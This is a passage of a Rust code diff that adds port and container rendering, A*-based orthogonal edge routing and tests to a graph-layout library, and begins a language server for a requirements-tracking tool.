"in".into(), + side: PortSide::Left, + direction: PortDirection::In, + port_type: PortType::Data, + }, + ], + }, + &|_idx, _e: &&str| EdgeInfo { + label: "conn".into(), + source_port: Some("A_out".into()), + target_port: Some("B_in".into()), + }, + &LayoutOptions::default(), + ); + + let edge = &result.edges[0]; + assert_eq!(edge.source_port.as_deref(), Some("A_out")); + assert_eq!(edge.target_port.as_deref(), Some("B_in")); + + // Edge start point should be near A's right port + let node_a = result.nodes.iter().find(|n| n.id == "A").unwrap(); + let a_out = node_a.ports.iter().find(|p| p.id == "A_out").unwrap(); + let start = edge.points[0]; + assert!( + (start.0 - a_out.x).abs() < 2.0, + "edge should start at port x" + ); + } + + #[allow(clippy::ptr_arg)] + fn string_node_info(_idx: NodeIndex, label: &String) -> NodeInfo { + NodeInfo { + id: label.clone(), + label: label.clone(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![], + } + } + + #[allow(clippy::ptr_arg)] + fn string_edge_info(_idx: EdgeIndex, label: &String) -> EdgeInfo { + EdgeInfo { + label: label.clone(), + source_port: None, + target_port: None, + } + } + + #[test] + fn budget_exceeded_returns_sentinel() { + let mut g: Graph = Graph::new(); + for i in 0..10 { + g.add_node(format!("N-{i}")); + } + let opts = LayoutOptions { + max_nodes: Some(5), + ..Default::default() + }; + let result = layout(&g, &string_node_info, &string_edge_info, &opts); + assert_eq!(result.nodes.len(), 1); + assert_eq!(result.nodes[0].id, "__budget_exceeded__"); + assert!(result.nodes[0].label.contains("10 nodes")); + assert!(result.edges.is_empty()); + } + + #[test] + fn budget_allows_within_limit() { + let mut g: Graph = Graph::new(); + for i in 0..5 { + g.add_node(format!("N-{i}")); + } + let opts = LayoutOptions { + max_nodes: Some(10), + ..Default::default() + }; + let result = layout(&g, &string_node_info, &string_edge_info, &opts); + assert_eq!(result.nodes.len(), 5); + } } diff --git a/etch/src/lib.rs b/etch/src/lib.rs index e37427b..f8a343b 100644 --- a/etch/src/lib.rs +++ b/etch/src/lib.rs @@ -25,8 +25,8 @@ //! //! let gl = layout( //! &g, -//! &|_idx, n| NodeInfo { id: n.to_string(), label: n.to_string(), node_type: "default".into(), sublabel: None }, -//! &|_idx, e| EdgeInfo { label: e.to_string() }, +//! &|_idx, n| NodeInfo { id: n.to_string(), label: n.to_string(), node_type: "default".into(), sublabel: None, parent: None, ports: vec![] }, +//! &|_idx, e| EdgeInfo { label: e.to_string(), source_port: None, target_port: None }, //! &LayoutOptions::default(), //! ); //! @@ -35,5 +35,7 @@ //! ``` pub mod filter; +pub mod html; pub mod layout; +pub mod ortho; pub mod svg; diff --git a/etch/src/ortho.rs b/etch/src/ortho.rs new file mode 100644 index 0000000..3bb5c7b --- /dev/null +++ b/etch/src/ortho.rs @@ -0,0 +1,422 @@ +//! Orthogonal edge routing with obstacle avoidance. +//! +//! Routes edges as sequences of horizontal and vertical line segments, +//! avoiding node rectangles. Uses a simplified visibility-graph approach: +//! +//! 1. Build padded obstacle rectangles from all nodes. +//! 2. Generate candidate waypoints at obstacle corners. +//! 3. Find shortest orthogonal path using A* with bend penalty. + +use std::cmp::Ordering; +use std::collections::{BinaryHeap, HashMap}; + +use crate::layout::LayoutNode; + +/// Padding around obstacle rectangles (px). +const OBSTACLE_PADDING: f64 = 6.0; + +/// An axis-aligned rectangle used as an obstacle. +#[derive(Debug, Clone, Copy)] +struct Rect { + x1: f64, + y1: f64, + x2: f64, + y2: f64, +} + +impl Rect { + fn contains(&self, x: f64, y: f64) -> bool { + x >= self.x1 && x <= self.x2 && y >= self.y1 && y <= self.y2 + } + + fn intersects_segment(&self, ax: f64, ay: f64, bx: f64, by: f64) -> bool { + // Check if horizontal or vertical segment intersects this rectangle + if (ay - by).abs() < 0.001 { + // Horizontal segment + let y = ay; + if y < self.y1 || y > self.y2 { + return false; + } + let min_x = ax.min(bx); + let max_x = ax.max(bx); + min_x < self.x2 && max_x > self.x1 + } else if (ax - bx).abs() < 0.001 { + // Vertical segment + let x = ax; + if x < self.x1 || x > self.x2 { + return false; + } + let min_y = ay.min(by); + let max_y = ay.max(by); + min_y < self.y2 && max_y > self.y1 + } else { + false // Non-axis-aligned segments not handled + } + } +} + +/// A* node for orthogonal pathfinding. +#[derive(Debug, Clone)] +struct PathNode { + x: f64, + y: f64, + cost: f64, + /// Direction of the segment leading to this node (for bend penalty). + /// 0 = start, 1 = horizontal, 2 = vertical + dir: u8, +} + +impl PartialEq for PathNode { + fn eq(&self, other: &Self) -> bool { + self.cost == other.cost + } +} + +impl Eq for PathNode {} + +impl PartialOrd for PathNode { + fn partial_cmp(&self, other: &Self) -> Option { + Some(self.cmp(other)) + } +} + +impl Ord for PathNode { + fn cmp(&self, other: &Self) -> Ordering { + // Reverse ordering for min-heap + other + .cost + .partial_cmp(&self.cost) + .unwrap_or(Ordering::Equal) + } +} + +/// Discretize a coordinate for use as HashMap key. +fn grid_key(x: f64, y: f64) -> (i64, i64) { + ((x * 100.0) as i64, (y * 100.0) as i64) +} + +/// Route an edge orthogonally from `src` to `tgt`, avoiding obstacles. +/// +/// Returns a list of waypoints where all consecutive pairs form +/// horizontal or vertical segments. +pub fn route_orthogonal( + nodes: &[LayoutNode], + src: (f64, f64), + tgt: (f64, f64), + bend_penalty: f64, + _port_stub_length: f64, +) -> Vec<(f64, f64)> { + // Trivial case: same point + if (src.0 - tgt.0).abs() < 0.001 && (src.1 - tgt.1).abs() < 0.001 { + return vec![src]; + } + + // If source and target share an axis, try direct line + let obstacles = build_obstacles(nodes); + + if can_route_direct(&obstacles, src, tgt) { + return if (src.0 - tgt.0).abs() < 0.001 || (src.1 - tgt.1).abs() < 0.001 { + vec![src, tgt] + } else { + // One bend: go horizontal then vertical + let mid = (tgt.0, src.1); + if !segment_blocked(&obstacles, src.0, src.1, mid.0, mid.1) + && !segment_blocked(&obstacles, mid.0, mid.1, tgt.0, tgt.1) + { + vec![src, mid, tgt] + } else { + let mid2 = (src.0, tgt.1); + if !segment_blocked(&obstacles, src.0, src.1, mid2.0, mid2.1) + && !segment_blocked(&obstacles, mid2.0, mid2.1, tgt.0, tgt.1) + { + vec![src, mid2, tgt] + } else { + route_with_astar(&obstacles, src, tgt, bend_penalty) + } + } + }; + } + + route_with_astar(&obstacles, src, tgt, bend_penalty) +} + +fn build_obstacles(nodes: &[LayoutNode]) -> Vec { + nodes + .iter() + .map(|n| Rect { + x1: n.x - OBSTACLE_PADDING, + y1: n.y - OBSTACLE_PADDING, + x2: n.x + n.width + OBSTACLE_PADDING, + y2: n.y + n.height + OBSTACLE_PADDING, + }) + .collect() +} + +fn can_route_direct(obstacles: &[Rect], src: (f64, f64), tgt: (f64, f64)) -> bool { + // Direct horizontal or vertical line + if (src.0 - tgt.0).abs() < 0.001 || (src.1 - tgt.1).abs() < 0.001 { + return !segment_blocked(obstacles, src.0, src.1, tgt.0, tgt.1); + } + false +} + +fn segment_blocked(obstacles: &[Rect], x1: f64, y1: f64, x2: f64, y2: f64) -> bool { + obstacles + .iter() + .any(|r| r.intersects_segment(x1, y1, x2, y2)) +} + +fn route_with_astar( + obstacles: &[Rect], + src: (f64, f64), + tgt: (f64, f64), + bend_penalty: f64, +) -> Vec<(f64, f64)> { + // Generate candidate waypoints from obstacle corners + src/tgt + let mut candidates: Vec<(f64, f64)> = vec![src, tgt]; + + for r in obstacles { + // Add corner points (slightly outside the obstacle) + candidates.push((r.x1, r.y1)); + candidates.push((r.x2, r.y1)); + candidates.push((r.x1, r.y2)); + candidates.push((r.x2, r.y2)); + } + + // Also add axis-aligned projections of src/tgt through obstacle corners + for r in obstacles { + candidates.push((src.0, r.y1)); + candidates.push((src.0, r.y2)); + candidates.push((r.x1, src.1)); + candidates.push((r.x2, src.1)); + candidates.push((tgt.0, r.y1)); + candidates.push((tgt.0, r.y2)); + candidates.push((r.x1, tgt.1)); + candidates.push((r.x2, tgt.1)); + } + + // Filter out candidates inside obstacles + candidates.retain(|&(x, y)| !obstacles.iter().any(|r| r.contains(x, y))); + + // Deduplicate + candidates.sort_by(|a, b| { + a.0.partial_cmp(&b.0) + .unwrap_or(Ordering::Equal) + .then(a.1.partial_cmp(&b.1).unwrap_or(Ordering::Equal)) + }); + candidates.dedup_by(|a, b| (a.0 - b.0).abs() < 0.01 && (a.1 - b.1).abs() < 0.01); + + // A* search + let src_key = grid_key(src.0, src.1); + let tgt_key = grid_key(tgt.0, tgt.1); + + let mut heap = BinaryHeap::new(); + type GridKey = (i64, i64); + // (cost, direction, predecessor) + let mut best: HashMap)> = HashMap::new(); + + heap.push(PathNode { + x: src.0, + y: src.1, + cost: 0.0, + dir: 0, + }); + best.insert(src_key, (0.0, 0, None)); + + while let Some(current) = heap.pop() { + let cur_key = grid_key(current.x, current.y); + + if cur_key == tgt_key { + break; + } + + if let Some(&(best_cost, _, _)) = best.get(&cur_key) + && current.cost > best_cost + 0.001 + { + continue; + } + + // Try reaching each candidate via orthogonal segment + for &(cx, cy) in &candidates { + let c_key = grid_key(cx, cy); + if c_key == cur_key { + continue; + } + + // Must share an axis (orthogonal move) + let is_horizontal = (current.y - cy).abs() < 0.01; + let is_vertical = (current.x - cx).abs() < 0.01; + + if !is_horizontal && !is_vertical { + continue; + } + + // Check if segment is blocked + if segment_blocked(obstacles, current.x, current.y, cx, cy) { + continue; + } + + let dir = if is_horizontal { 1 } else { 2 }; + let dist = if is_horizontal { + (current.x - cx).abs() + } else { + (current.y - cy).abs() + }; + + let bend_cost = if current.dir != 0 && current.dir != dir { + bend_penalty + } else { + 0.0 + }; + + let new_cost = current.cost + dist + bend_cost; + + let is_better = match best.get(&c_key) { + Some(&(prev_cost, _, _)) => new_cost < prev_cost - 0.001, + None => true, + }; + + if is_better { + best.insert(c_key, (new_cost, dir, Some(cur_key))); + heap.push(PathNode { + x: cx, + y: cy, + cost: new_cost, + dir, + }); + } + } + } + + // Reconstruct path + let mut path = Vec::new(); + let mut key = tgt_key; + + loop { + match best.get(&key) { + Some(&(_, _, Some(prev))) => { + // Find the point for this key + let (x, y) = (key.0 as f64 / 100.0, key.1 as f64 / 100.0); + path.push((x, y)); + key = prev; + } + _ => { + path.push(src); + break; + } + } + } + + path.reverse(); + + // If path is empty or single point, fallback to L-shaped route + if path.len() < 2 { + let mid = (tgt.0, src.1); + return vec![src, mid, tgt]; + } + + path +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::layout::LayoutNode; + + fn make_node(id: &str, x: f64, y: f64, w: f64, h: f64) -> LayoutNode { + LayoutNode { + id: id.into(), + x, + y, + width: w, + height: h, + rank: 0, + label: id.into(), + node_type: "default".into(), + sublabel: None, + is_container: false, + ports: vec![], + } + } + + #[test] + fn direct_vertical_no_obstacles() { + let nodes = vec![]; + let path = route_orthogonal(&nodes, (100.0, 0.0), (100.0, 200.0), 20.0, 10.0); + assert_eq!(path.len(), 2); + assert!((path[0].0 - 100.0).abs() < 0.1); + assert!((path[1].0 - 100.0).abs() < 0.1); + } + + #[test] + fn direct_horizontal_no_obstacles() { + let nodes = vec![]; + let path = route_orthogonal(&nodes, (0.0, 100.0), (200.0, 100.0), 20.0, 10.0); + assert_eq!(path.len(), 2); + } + + #[test] + fn l_shaped_no_obstacles() { + let nodes = vec![]; + let path = route_orthogonal(&nodes, (0.0, 0.0), (200.0, 200.0), 20.0, 10.0); + // Should have one bend (3 points) + assert!(path.len() >= 2); + // All segments orthogonal + for w in path.windows(2) { + let dx = (w[0].0 - w[1].0).abs(); + let dy = (w[0].1 - w[1].1).abs(); + assert!( + dx < 0.1 || dy < 0.1, + "non-orthogonal: ({},{})->({},{})", + w[0].0, + w[0].1, + w[1].0, + w[1].1 + ); + } + } + + #[test] + fn routes_around_obstacle() { + // Node B sits between src and tgt + let nodes = vec![make_node("B", 90.0, 90.0, 20.0, 20.0)]; + let path = route_orthogonal(&nodes, (100.0, 50.0), (100.0, 150.0), 20.0, 10.0); + + // Path should avoid the obstacle (more than 2 points) + assert!( + path.len() >= 3, + "should route around obstacle, got {} points", + path.len() + ); + + // All segments orthogonal + for w in path.windows(2) { + let dx = (w[0].0 - w[1].0).abs(); + let dy = (w[0].1 - w[1].1).abs(); + assert!(dx < 0.1 || dy < 0.1, "non-orthogonal segment"); + } + } + + #[test] + fn all_segments_orthogonal() { + let nodes = vec![ + make_node("A", 0.0, 0.0, 80.0, 40.0), + make_node("B", 200.0, 0.0, 80.0, 40.0), + make_node("C", 100.0, 100.0, 80.0, 40.0), + ]; + let path = route_orthogonal(&nodes, (80.0, 20.0), (200.0, 120.0), 20.0, 10.0); + + for w in path.windows(2) { + let dx = (w[0].0 - w[1].0).abs(); + let dy = (w[0].1 - w[1].1).abs(); + assert!( + dx < 0.1 || dy < 0.1, + "non-orthogonal: ({:.1},{:.1})->({:.1},{:.1})", + w[0].0, + w[0].1, + w[1].0, + w[1].1 + ); + } + } +} diff --git a/etch/src/svg.rs b/etch/src/svg.rs index 7700e26..d5d4d8f 100644 --- a/etch/src/svg.rs +++ b/etch/src/svg.rs @@ -70,7 +70,9 @@ pub fn render_svg(layout: &GraphLayout, options: &SvgOptions) -> String { let vb_w = layout.width + pad * 2.0; let vb_h = layout.height + pad * 2.0; - let mut svg = String::with_capacity(4096); + // Estimate ~500 bytes per node + ~200 bytes per edge + base overhead. + let estimated = 2048 + layout.nodes.len() * 500 + layout.edges.len() * 200; + let mut svg = String::with_capacity(estimated); // Opening tag. writeln!( @@ -149,7 +151,16 @@ fn write_style(svg: &mut String, options: &SvgOptions) { \x20 .edge text {{ font-family: {font}; font-size: {}px; \ fill: #555; text-anchor: middle; dominant-baseline: central; \ font-weight: 500; }}\n\ + \x20 .node.container rect {{ stroke-dasharray: 4 2; }}\n\ \x20 .node:hover rect {{ filter: brightness(0.92); }}\n\ + \x20 .port circle {{ stroke: #333; stroke-width: 0.8; }}\n\ + \x20 .port.data circle {{ fill: #4a90d9; }}\n\ + \x20 .port.event circle {{ fill: #e67e22; }}\n\ + \x20 .port.event-data circle {{ fill: #27ae60; }}\n\ + \x20 .port.access circle {{ fill: #999; }}\n\ + \x20 .port.group circle {{ fill: #9b59b6; }}\n\ + \x20 .port.abstract circle {{ fill: #666; }}\n\ + \x20 .port text {{ font-size: 9px; fill: #444; dominant-baseline: central; }}\n\ \x20 \n", fs - 2.0, fs - 2.0, @@ -212,7 +223,13 @@ fn write_nodes(svg: &mut String, layout: &GraphLayout, options: &SvgOptions) { let default_fill = "#e8e8e8".to_string(); - for node in &layout.nodes { + // Draw containers first (background), then leaf nodes on top. + let containers: Vec<&crate::layout::LayoutNode> = + layout.nodes.iter().filter(|n| n.is_container).collect(); + let leaves: Vec<&crate::layout::LayoutNode> = + layout.nodes.iter().filter(|n| !n.is_container).collect(); + + for node in containers.iter().chain(leaves.iter()) { let fill = options .type_colors .get(&node.node_type) @@ -226,9 +243,10 @@ fn write_nodes(svg: &mut String, layout: &GraphLayout, options: &SvgOptions) { } } + let class_suffix = if node.is_container { " container" } else { "" }; writeln!( svg, - " ", + " ", css_class_safe(&node.node_type), ) .unwrap(); @@ -236,44 +254,146 @@ fn write_nodes(svg: &mut String, layout: &GraphLayout, options: &SvgOptions) { // Rectangle. let r = options.rounded_corners; let is_highlighted = options.highlight.as_ref().is_some_and(|h| h == &node.id); - let stroke_w = if is_highlighted { "3.0" } else { "1.5" }; + let stroke_w = if is_highlighted { + "3.0" + } else if node.is_container { + "2.0" + } else { + "1.5" + }; let stroke_c = if is_highlighted { "#ff6600" } else { "#333" }; + let container_fill = if node.is_container { + // Lighten container fill for better contrast with children. + lighten_color(fill) + } else { + fill.to_string() + }; writeln!( svg, " ", + rx=\"{r}\" ry=\"{r}\" fill=\"{container_fill}\" stroke=\"{stroke_c}\" stroke-width=\"{stroke_w}\" />", node.x, node.y, node.width, node.height, ) .unwrap(); - // Primary label. - let text_y = if node.sublabel.is_some() { - node.y + node.height / 2.0 - options.font_size * 0.45 + if node.is_container { + // Container: label in header bar. + let header_y = node.y + options.font_size + 4.0; + writeln!( + svg, + " {}", + node.x + node.width / 2.0, + xml_escape(&node.label), + ) + .unwrap(); + if let Some(ref sub) = node.sublabel { + let sub_y = header_y + options.font_size; + writeln!( + svg, + " {}", + node.x + node.width / 2.0, + xml_escape(sub), + ) + .unwrap(); + } } else { - node.y + node.height / 2.0 - }; - writeln!( - svg, - " {}", - node.x + node.width / 2.0, - xml_escape(&node.label), - ) - .unwrap(); - - // Sublabel. - if let Some(ref sub) = node.sublabel { - let sub_y = node.y + node.height / 2.0 + options.font_size * 0.65; + // Leaf node: label centered. + let text_y = if node.sublabel.is_some() { + node.y + node.height / 2.0 - options.font_size * 0.45 + } else { + node.y + node.height / 2.0 + }; writeln!( svg, - " {}", + " {}", node.x + node.width / 2.0, - xml_escape(sub), + xml_escape(&node.label), + ) + .unwrap(); + if let Some(ref sub) = node.sublabel { + let sub_y = node.y + node.height / 2.0 + options.font_size * 0.65; + writeln!( + svg, + " {}", + node.x + node.width / 2.0, + xml_escape(sub), + ) + .unwrap(); + } + } + + // Ports. + for port in &node.ports { + let port_class = match port.port_type { + crate::layout::PortType::Data => "data", + crate::layout::PortType::Event => "event", + crate::layout::PortType::EventData => "event-data", + crate::layout::PortType::Access => "access", + crate::layout::PortType::Group => "group", + crate::layout::PortType::Abstract => "abstract", + }; + writeln!( + svg, + " ", + xml_escape(&port.id), + ) + .unwrap(); + // Port circle + writeln!( + svg, + " ", + port.x, port.y, ) .unwrap(); + // Direction indicator (small triangle) + let tri = match port.direction { + crate::layout::PortDirection::In => { + // Inward-pointing triangle + match port.side { + crate::layout::PortSide::Left => { + format!("M {} {} l 4 -2.5 l 0 5 Z", port.x + 4.0, port.y) + } + crate::layout::PortSide::Right => { + format!("M {} {} l -4 -2.5 l 0 5 Z", port.x - 4.0, port.y) + } + _ => String::new(), + } + } + crate::layout::PortDirection::Out => { + // Outward-pointing triangle + match port.side { + crate::layout::PortSide::Left => { + format!("M {} {} l -4 -2.5 l 0 5 Z", port.x - 4.0, port.y) + } + crate::layout::PortSide::Right => { + format!("M {} {} l 4 -2.5 l 0 5 Z", port.x + 4.0, port.y) + } + _ => String::new(), + } + } + crate::layout::PortDirection::InOut => String::new(), + }; + if !tri.is_empty() { + writeln!(svg, " ").unwrap(); + } + // Port label + let (lx, anchor) = match port.side { + crate::layout::PortSide::Left => (port.x + 6.0, "start"), + crate::layout::PortSide::Right => (port.x - 6.0, "end"), + _ => (port.x, "middle"), + }; + writeln!( + svg, + " {}", + port.y, + xml_escape(&port.label), + ) + .unwrap(); + svg.push_str(" \n"); } // Tooltip. - writeln!(svg, " {}", xml_escape(&node.id),).unwrap(); + writeln!(svg, " {}", xml_escape(&node.id)).unwrap(); svg.push_str(" \n"); } @@ -281,6 +401,26 @@ fn write_nodes(svg: &mut String, layout: &GraphLayout, options: &SvgOptions) { svg.push_str(" \n"); } +/// Lighten a hex color for container backgrounds (add transparency effect). +fn lighten_color(hex: &str) -> String { + if !hex.starts_with('#') || hex.len() < 7 { + return format!("{hex}40"); // fallback: add alpha + } + let r = u8::from_str_radix(&hex[1..3], 16).unwrap_or(200); + let g = u8::from_str_radix(&hex[3..5], 16).unwrap_or(200); + let b = u8::from_str_radix(&hex[5..7], 16).unwrap_or(200); + // Blend toward white by 70%. + let lr = r as u16 + (255 - r as u16) * 70 / 100; + let lg = g as u16 + (255 - g as u16) * 70 / 100; + let lb = b as u16 + (255 - b as u16) * 70 / 100; + format!( + "#{:02x}{:02x}{:02x}", + lr.min(255) as u8, + lg.min(255) as u8, + lb.min(255) as u8 + ) +} + /// Build a smooth cubic bezier SVG path through the given waypoints. /// /// For two points this produces a straight line (`M ... L ...`). @@ -291,11 +431,24 @@ fn build_bezier_path(points: &[(f64, f64)]) -> String { let (x0, y0) = points[0]; write!(d, "M {x0} {y0}").unwrap(); - if points.len() == 2 { + // Check if all segments are axis-aligned (orthogonal routing) + let is_orthogonal = points.len() >= 2 + && points.windows(2).all(|w| { + let dx = (w[0].0 - w[1].0).abs(); + let dy = (w[0].1 - w[1].1).abs(); + dx < 0.1 || dy < 0.1 + }); + + if is_orthogonal { + // Polyline with straight segments (L commands) + for &(x, y) in &points[1..] { + write!(d, " L {x} {y}").unwrap(); + } + } else if points.len() == 2 { let (x1, y1) = points[1]; write!(d, " L {x1} {y1}").unwrap(); } else { - // Simple cubic bezier: for each segment use vertical tangent handles. + // Cubic bezier: for each segment use vertical tangent handles. for i in 0..points.len() - 1 { let (x1, y1) = points[i]; let (x2, y2) = points[i + 1]; @@ -336,7 +489,9 @@ fn css_class_safe(s: &str) -> String { #[cfg(test)] mod tests { use super::*; - use crate::layout::{EdgeInfo, LayoutOptions, NodeInfo, layout}; + use crate::layout::{ + EdgeInfo, LayoutOptions, NodeInfo, PortDirection, PortInfo, PortSide, PortType, layout, + }; use petgraph::Graph; use petgraph::graph::{EdgeIndex, NodeIndex}; @@ -353,9 +508,13 @@ mod tests { label: n.to_string(), node_type: "req".into(), sublabel: Some("Title".into()), + parent: None, + ports: vec![], }, &|_idx: EdgeIndex, e: &&str| EdgeInfo { label: e.to_string(), + source_port: None, + target_port: None, }, &LayoutOptions::default(), ) @@ -452,6 +611,188 @@ mod tests { assert!(svg.contains("B")); } + #[test] + fn svg_compound_container_rendering() { + // Build a compound graph and verify container SVG output. + let mut g = Graph::new(); + let _s = g.add_node("System"); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "conn"); + + let gl = layout( + &g, + &|_idx: NodeIndex, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "system".into(), + sublabel: None, + parent: if *n == "A" || *n == "B" { + Some("System".into()) + } else { + None + }, + ports: vec![], + }, + &|_idx: EdgeIndex, e: &&str| EdgeInfo { + label: e.to_string(), + source_port: None, + target_port: None, + }, + &LayoutOptions::default(), + ); + + let mut colors = HashMap::new(); + colors.insert("system".into(), "#4a90d9".into()); + let svg = render_svg( + &gl, + &SvgOptions { + type_colors: colors, + ..Default::default() + }, + ); + + // Container should have the "container" CSS class. + assert!( + svg.contains("container"), + "SVG should contain 'container' class" + ); + // Container should use dashed stroke style (from CSS). + assert!(svg.contains("stroke-dasharray")); + // Container label should be bold. + assert!(svg.contains("font-weight=\"bold\"")); + // Container fill should be lightened (not the original color). + assert!( + !svg.contains("fill=\"#4a90d9\"") || svg.contains("font-weight=\"bold\""), + "Container fill should be lightened" + ); + } + + #[test] + fn lighten_color_basic() { + let result = lighten_color("#000000"); + // Black lightened 70% toward white should be ~#b3b3b3. + assert_eq!(result, "#b2b2b2"); + + let result = lighten_color("#ffffff"); + // White stays white. + assert_eq!(result, "#ffffff"); + + let result = lighten_color("#ff0000"); + // Red channel stays 255, G and B go up. + assert!(result.starts_with("#ff")); + } + + #[test] + fn svg_orthogonal_edges_use_line_commands() { + let mut g = Graph::new(); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "ab"); + + let gl = layout( + &g, + &|_idx: NodeIndex, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![], + }, + &|_idx: EdgeIndex, e: &&str| EdgeInfo { + label: e.to_string(), + source_port: None, + target_port: None, + }, + &LayoutOptions { + edge_routing: crate::layout::EdgeRouting::Orthogonal, + ..Default::default() + }, + ); + + let svg = render_svg(&gl, &SvgOptions::default()); + // Orthogonal edges should use L (line-to) commands, not C (cubic) + assert!( + svg.contains(" L "), + "orthogonal edges should use L commands" + ); + // Should NOT contain C commands for orthogonal edges + assert!( + !svg.contains(" C "), + "orthogonal edges should not use C (bezier) commands" + ); + } + + #[test] + fn svg_renders_ports() { + let mut g = Graph::new(); + let _a = g.add_node("A"); + + let gl = layout( + &g, + &|_idx: NodeIndex, _n: &&str| NodeInfo { + id: "A".into(), + label: "A".into(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![ + PortInfo { + id: "data_in".into(), + label: "data_in".into(), + side: PortSide::Left, + direction: PortDirection::In, + port_type: PortType::Data, + }, + PortInfo { + id: "event_out".into(), + label: "event_out".into(), + side: PortSide::Right, + direction: PortDirection::Out, + port_type: PortType::Event, + }, + ], + }, + &|_idx: EdgeIndex, _e: &&str| EdgeInfo { + label: String::new(), + source_port: None, + target_port: None, + }, + &LayoutOptions::default(), + ); + + let svg = render_svg(&gl, &SvgOptions::default()); + // Port elements present + assert!( + svg.contains("class=\"port data\""), + "should have data port class" + ); + assert!( + svg.contains("class=\"port event\""), + "should have event port class" + ); + // Port circles present + assert!(svg.contains("data_in<"), "should have port label"); + assert!(svg.contains(">event_out<"), "should have port label"); + // Port CSS styles present + assert!( + svg.contains(".port.data circle"), + "should have port data CSS" + ); + assert!( + svg.contains(".port.event circle"), + "should have port event CSS" + ); + // Direction indicator triangle + assert!( + svg.contains(", +} + +// --------------------------------------------------------------------------- +// Text utilities +// --------------------------------------------------------------------------- + +/// Extract the artifact ID at the given (0-based line, 0-based column) position +/// if the cursor sits inside a `[[ID]]` reference. +pub(crate) fn artifact_id_at_position(text: &str, line: u32, character: u32) -> Option { + let target_line = text.lines().nth(line as usize)?; + let col = character as usize; + + // Walk backwards from cursor to find `[[` + let bytes = target_line.as_bytes(); + let mut start = None; + let mut i = col.min(bytes.len()); + while i >= 2 { + if bytes[i - 2] == b'[' && bytes[i - 1] == b'[' { + start = Some(i); + break; + } + // If we cross a `]]` boundary going backwards, stop. + if bytes[i - 1] == b']' && i >= 2 && bytes[i - 2] == b']' { + break; + } + i -= 1; + } + + let start = start?; + + // Walk forward from `[[` to find `]]` + let rest = &target_line[start..]; + let end = rest.find("]]")?; + let id = rest[..end].trim(); + + // Make sure the cursor is actually inside the `[[...]]` span. + let bracket_end = start + end + 2; + if col < start.saturating_sub(2) || col > bracket_end { + return None; + } + + if id.is_empty() { + return None; + } + + Some(id.to_string()) +} + +/// Also check for bare artifact IDs on YAML `id:` or `target:` lines. +pub(crate) fn yaml_artifact_id_at_position(text: &str, line: u32) -> Option { + let target_line = text.lines().nth(line as usize)?; + let trimmed = target_line.trim(); + + // `- id: SOME-ID` or `id: SOME-ID` + if let Some(rest) = trimmed + .strip_prefix("- id:") + .or_else(|| trimmed.strip_prefix("id:")) + { + let id = rest.trim(); + if !id.is_empty() { + return Some(id.to_string()); + } + } + + // `target: SOME-ID` + if let Some(rest) = trimmed + .strip_prefix("- target:") + .or_else(|| trimmed.strip_prefix("target:")) + { + let id = rest.trim(); + if !id.is_empty() { + return Some(id.to_string()); + } + } + + None +} + +/// Scan a YAML file to build an (artifact_id -> line_number) map. +/// +/// Looks for lines matching `- id: ` or ` id: `. +pub(crate) fn scan_artifact_locations( + path: &Path, + content: &str, +) -> HashMap { + let mut map = HashMap::new(); + for (line_idx, line) in content.lines().enumerate() { + let trimmed = line.trim(); + let id = if let Some(rest) = trimmed.strip_prefix("- id:") { + rest.trim() + } else if let Some(rest) = trimmed.strip_prefix("id:") { + rest.trim() + } else { + continue; + }; + if !id.is_empty() { + map.insert(id.to_string(), (path.to_path_buf(), line_idx as u32)); + } + } + map +} + +// --------------------------------------------------------------------------- +// Diagnostic conversion +// --------------------------------------------------------------------------- + +/// Convert a rivet-core `Diagnostic` into an LSP `Diagnostic`. +pub(crate) fn to_lsp_diagnostic( + diag: &validate::Diagnostic, + locations: &HashMap, +) -> lsp_types::Diagnostic { + let range = diag + .artifact_id + .as_ref() + .and_then(|id| locations.get(id)) + .map(|(_path, line)| Range { + start: Position::new(*line, 0), + end: Position::new(*line, 999), + }) + .unwrap_or_default(); + + lsp_types::Diagnostic { + range, + severity: Some(match diag.severity { + Severity::Error => DiagnosticSeverity::ERROR, + Severity::Warning => DiagnosticSeverity::WARNING, + Severity::Info => DiagnosticSeverity::INFORMATION, + }), + code: Some(NumberOrString::String(diag.rule.clone())), + source: Some("rivet".into()), + message: diag.message.clone(), + ..Default::default() + } +} + +// --------------------------------------------------------------------------- +// Build hover markdown for an artifact +// --------------------------------------------------------------------------- + +fn hover_markdown(artifact: &Artifact) -> String { + let mut md = format!("### {}\n\n", artifact.title); + md.push_str(&format!("**Type:** `{}`\n\n", artifact.artifact_type)); + if let Some(status) = &artifact.status { + md.push_str(&format!("**Status:** `{status}`\n\n")); + } + if let Some(desc) = &artifact.description { + let preview = if desc.len() > 300 { + format!("{}...", &desc[..300]) + } else { + desc.clone() + }; + md.push_str(&format!("---\n\n{preview}\n")); + } + if !artifact.links.is_empty() { + md.push_str("\n**Links:**\n"); + for link in &artifact.links { + md.push_str(&format!("- `{}` -> `{}`\n", link.link_type, link.target)); + } + } + md +} + +// --------------------------------------------------------------------------- +// RivetLsp — the LanguageServer implementation +// --------------------------------------------------------------------------- + +pub(crate) struct RivetLsp { + client: Client, + /// In-memory document contents keyed by URI. + documents: Mutex>, + /// Current project snapshot (rebuilt on save). + snapshot: Mutex>, + /// Project root directory (the folder containing rivet.yaml). + project_root: Mutex>, +} + +impl RivetLsp { + fn new(client: Client) -> Self { + Self { + client, + documents: Mutex::new(HashMap::new()), + snapshot: Mutex::new(None), + project_root: Mutex::new(None), + } + } + + /// Detect the project root from a file URI by walking up to find rivet.yaml. + fn detect_project_root(&self, uri: &Url) -> Option { + let file_path = uri.to_file_path().ok()?; + let mut dir = file_path.parent()?; + loop { + if dir.join("rivet.yaml").exists() { + return Some(dir.to_path_buf()); + } + dir = dir.parent()?; + } + } + + /// Rebuild the project snapshot and publish diagnostics. + async fn rebuild_and_publish(&self, trigger_uri: Url) { + // Detect project root if not set. + { + let mut root = self.project_root.lock().unwrap(); + if root.is_none() + && let Some(detected) = self.detect_project_root(&trigger_uri) + { + *root = Some(detected); + } + } + + let project_root = { + let root = self.project_root.lock().unwrap(); + root.clone() + }; + + let project_root = match project_root { + Some(r) => r, + None => { + 